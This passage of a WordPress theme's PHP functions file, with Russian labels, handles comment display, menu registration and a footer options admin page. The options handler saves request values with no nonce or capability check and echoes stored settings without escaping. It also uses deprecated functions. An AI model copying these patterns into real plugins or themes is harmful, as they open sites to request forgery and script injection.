		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s - %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Футер", "Футер", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Футер</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
